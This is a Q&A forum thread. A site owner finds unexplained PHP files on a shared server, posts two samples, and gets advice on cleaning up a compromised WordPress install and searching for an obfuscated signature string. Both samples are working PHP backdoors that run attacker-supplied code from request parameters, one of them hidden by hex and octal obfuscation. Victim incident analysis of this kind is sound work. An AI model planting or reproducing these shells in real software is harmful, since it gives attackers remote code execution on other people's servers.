1

I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.

I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.

However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.

Here is a sample...

<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);

...and another...

<?php

$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';@$adnmo($acnhe);@eval($acnhe); 
$k=substr("class",2)."ert"; @ $k(${"_PO"."ST"} ['335']);

Anyone able to explain what these would do if/when called?

DreamingOfSleep
  • 1,208
  • 1
  • 11
  • 23

1 Answers1

3

Your wordpress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).

You can safely delete this file, and you should do it ASAP.

Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core php files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.

Javier Larroulet
  • 3,047
  • 3
  • 13
  • 30
  • Thanks, it was actually across a few sites, only one of which uses WP. I have deleted the files from all other sites, but as WP is such a large installation with so many .php files, I don't know if there are any in there that shouldn't be. Any idea how I clean the WP site? Thanks – DreamingOfSleep Sep 06 '18 at 16:50
  • If the site is on some flavor of linux, you could find all affected sites by using `grep` and delete the injected code with `sed` to make a replacement. You can even pipe both commands into a single one and make it recursive. Since you are mostly .net you probably are on windows, in which case I wouldn't know how to help – Javier Larroulet Sep 06 '18 at 17:05
  • I guess it's on Windows like you say. My problem is not finding .php files, I can do that easily, my problem is knowing which ones in the WP site are genuine and which aren't. None of the other sites use PHP, so any .php files there are suspicious, but as WP is built with PHP, I don't know what is genuine and what isn't. Any ideas? Thx – DreamingOfSleep Sep 06 '18 at 19:50
  • 1
    Oh I know finding php files is trivial. My point is that I don't know if Windows has something like grep and sed, which allow to search all files containing "something" and replace that "something" with "some other thing" (in this case, a blank space) in a one-liner. That said, these injections are usually the same across all files, so searching for all files containing `"s\x74\x72\x5fr\x65\x70\x6ca\x63e"` (which is simply the url enconded version of `str_replace`, not something you'd find in a non malicious payload but common on malicious ones) may help – Javier Larroulet Sep 06 '18 at 20:09
  • Thanks, that's a useful suggestion. Windows has equivalents of things like grep, but as I don't have console access to the server, I will probably have to write a script to do this. Still, with your useful comment here, it should be pretty easy to do. Thanks again. – DreamingOfSleep Sep 06 '18 at 22:16